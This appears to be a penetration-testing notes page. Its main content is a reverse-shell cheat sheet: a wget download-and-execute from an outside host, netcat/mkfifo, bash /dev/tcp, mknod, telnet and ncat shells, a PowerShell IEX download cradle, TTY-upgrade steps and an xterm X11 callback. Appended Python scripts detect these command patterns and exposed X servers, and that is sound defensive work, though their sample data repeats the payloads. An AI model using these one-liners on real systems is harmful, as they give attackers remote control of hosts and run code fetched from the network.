Reverse Shell
tags: Security ReverseShell
Move Payload to Target
Download from HTTPS Server
wget --no-check-certificate wildfoo.tw/reverse_shell -O /tmp/s
sh /tmp/s
Spawn Reverse Shell
Online Resource
- 7 linux shells using built in tools
- Pentestmonkey - Reverse Shell Cheat Sheet
Cheat Sheet
netcat (really reliable)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
ncat -lk -n -v 7777
with ssl
Target:
ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
Attacker:
ncat -v 10.0.0.22 4444 --ssl
bash
bash -i >& /dev/tcp/127.0.0.1/8787 0>&1
exec 5<>/dev/tcp/127.0.0.1/8787; cat <&5 | while read line; do $line 2>&5 >&5; done
mknod
use when nc was built without -e support (GAPING_SECURITY_HOLE disabled)
mknod backpipe p && nc 10.10.14.207 7777 0<backpipe | /bin/bash 1>backpipe
telnet
mknod backpipe p && telnet 10.10.14.207 7777 0<backpipe | /bin/bash
php
/usr/share/laudanum/php/php-reverse-shell.php
powershell
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 reverse.ps1
vim reverse.ps1
In vim, copy the .EXAMPLE line
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
to the end of the file, edit the IP and port, and delete the leading 'PS > '
python3 -m http.server 80
powershell IEX(New-Object Net.WebClient).downloadstring("http://10.10.14.42/reverse.ps1")
Sometimes the quotes need to be escaped as \"
Spawning fully interactive TTY Shell
Online Resource
Overview
A reverse shell obtained this way usually has some problems:
- Some commands, like su and ssh, require a proper terminal to run
- STDERR usually isn't displayed
- Can't properly use text editors like vim
- No tab-complete
- No up arrow history
- No job control
Upgrading simple shells to fully interactive TTYs
Steps
- use bash
- ncat -lk -n -v 7777 and get shell
- type python -c 'import pty; pty.spawn("/bin/bash")' in reverse shell
- Ctrl-Z
- type stty raw -echo
- fg<enter><enter>
- export TERM=xterm allows us to use Ctrl-l to clear the screen

Cheat Sheet
Python
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl
perl -e 'exec "/bin/sh";'
exec "/bin/sh";
ruby
exec "/bin/sh"
lua
os.execute('/bin/sh')
From within IRB
exec "/bin/sh"
From within vi
:!bash
:set shell=/bin/bash:shell
From within nmap
!sh
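The one-liners in this cheat sheet and the TTY upgrade steps above share a few stable command-line traits (a /dev/tcp redirect, a named pipe fed into nc or telnet, pty.spawn, stty raw -echo, an interpreter exec of /bin/sh, an IEX download cradle). The script below is an added example, not code from the original page: it matches process command lines against constructed regexes for those traits, the way a detection rule over auditd execve records or an EDR command-line feed would. The sample command lines are constructed and embedded so it runs offline.

```python
"""Flag command lines that match the reverse-shell and TTY-upgrade patterns
from the cheat sheet above (added example, not from the original page).
Real input would be auditd execve records or an EDR command-line feed;
constructed sample lines are embedded here so the script runs offline."""
import re
from typing import Dict, List, Tuple

# Each indicator is a constructed regex describing one technique family from the page.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("bash /dev/tcp redirect",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("fifo/named pipe piped into nc or telnet",
     re.compile(r"\bmk(?:fifo|nod)\s+\S+.*\b(?:nc|ncat|netcat|telnet)\b")),
    ("nc/ncat with -e or --exec",
     re.compile(r"\bn(?:c|cat)\b.*\s(?:-e|--exec)\s")),
    ("pty.spawn TTY upgrade",
     re.compile(r"\bpty\.spawn\(")),
    ("stty raw -echo TTY upgrade",
     re.compile(r"\bstty\s+raw\s+-echo\b")),
    ("interpreter exec of a shell",
     re.compile(r"(?:\bexec|os\.execute|os\.system)\s*\(?\s*['\"]/bin/(?:ba)?sh")),
    ("PowerShell IEX download cradle",
     re.compile(r"\bIEX\s*\(?\s*New-Object\s+Net\.WebClient\)?\.DownloadString\(",
                re.IGNORECASE)),
]


def classify(command: str) -> List[str]:
    """Return the names of every indicator that matches one command line."""
    return [name for name, pattern in INDICATORS if pattern.search(command)]


def scan_commands(commands: List[str]) -> Dict[int, List[str]]:
    """Map the index of each suspicious command line to its matched indicators.
    Lines that match nothing are omitted from the result."""
    hits: Dict[int, List[str]] = {}
    for i, cmd in enumerate(commands):
        names = classify(cmd)
        if names:
            hits[i] = names
    return hits


# Constructed sample: the page's own one-liners interleaved with ordinary admin activity.
SAMPLE_COMMANDS = [
    "ls -la /tmp",
    "bash -i >& /dev/tcp/127.0.0.1/8787 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f",
    "nc -zv db.internal 5432",
    "python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "stty raw -echo",
    "perl -e 'exec \"/bin/sh\";'",
    "vim /etc/hosts",
    'powershell IEX(New-Object Net.WebClient).downloadstring("http://10.10.14.42/reverse.ps1")',
]

if __name__ == "__main__":
    for idx, names in scan_commands(SAMPLE_COMMANDS).items():
        print(f"[{idx}] {SAMPLE_COMMANDS[idx]!r}")
        for name in names:
            print(f"      matched: {name}")
```

The benign port check `nc -zv db.internal 5432` is deliberately included: the nc indicator keys on `-e`/`--exec` rather than on the binary name, so routine connectivity tests do not fire. In practice these patterns are a starting point for a rule, to be tuned against the command-line baseline of the hosts being monitored.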
Other Tips
rlwrap
Getting Xterm shell
Make sure your Xserver is listening to TCP:
$ netstat -lntup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN -
tcp6 0 0 :::6000 :::* LISTEN -
New Xserver versions have tcp listening disabled by default. Consult your distro how to enable it. You may have to change your display manager settings or the xserverrc file, e.g.:
$ cat /etc/X11/xinit/xserverrc
#!/bin/sh
if [ -z "$XDG_VTNR" ]; then
    exec /usr/bin/X -listen tcp "$@"
else
    exec /usr/bin/X -listen tcp "$@" vt$XDG_VTNR
fi
Then all you have to do is to allow incoming connections from the specific IP:
$ xhost +10.10.10.69
Now let’s connect:
/usr/bin/xterm -display 10.10.15.203:0
or
DISPLAY=10.10.15.203:0 /usr/bin/xterm
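On the defending side the check runs the other way: an X server that listens on TCP on 0.0.0.0 or :: (display :N is TCP port 6000+N) lets any host that passes xhost open clients on the display, so the `netstat -lntup` lines quoted above are exactly what an audit script should look for. The parser below is an added example, not part of the original page; it assumes the netstat column layout shown above and constructs its sample output around the two lines the section quotes.

```python
"""Parse `netstat -lntup` output in the column layout shown above and report
X servers listening on TCP on a non-loopback address (added example, not
part of the original page). The sample output is constructed around the
two lines quoted on the page."""
from typing import List, Tuple

X11_BASE_PORT = 6000      # display :N listens on TCP port 6000+N
X11_MAX_DISPLAY = 63


def _is_loopback(addr: str) -> bool:
    return addr == "::1" or addr.startswith("127.")


def x11_tcp_exposure(netstat_output: str) -> List[Tuple[str, str, int]]:
    """Return (proto, bind address, display number) for every TCP LISTEN socket
    on an X11 port that is bound to a wildcard or other non-loopback address."""
    exposed: List[Tuple[str, str, int]] = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Data rows start with a protocol and carry Local, Foreign and State columns.
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        proto, local, state = fields[0], fields[3], fields[5]
        if state != "LISTEN":
            continue
        addr, _, port = local.rpartition(":")   # works for 0.0.0.0:6000 and :::6000
        if not port.isdigit():
            continue
        display = int(port) - X11_BASE_PORT
        if 0 <= display <= X11_MAX_DISPLAY and not _is_loopback(addr):
            exposed.append((proto, addr, display))
    return exposed


# Constructed sample built around the two X11 lines quoted on the page.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::6000                 :::*                    LISTEN      -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -
"""

if __name__ == "__main__":
    for proto, addr, display in x11_tcp_exposure(SAMPLE_NETSTAT):
        print(f"{proto}: X display :{display} reachable on {addr}")
```

A server that only needs local clients should not carry `-listen tcp` at all; if it must, the xhost list should name the specific address as the section does, since `xhost +` with no address disables access control entirely.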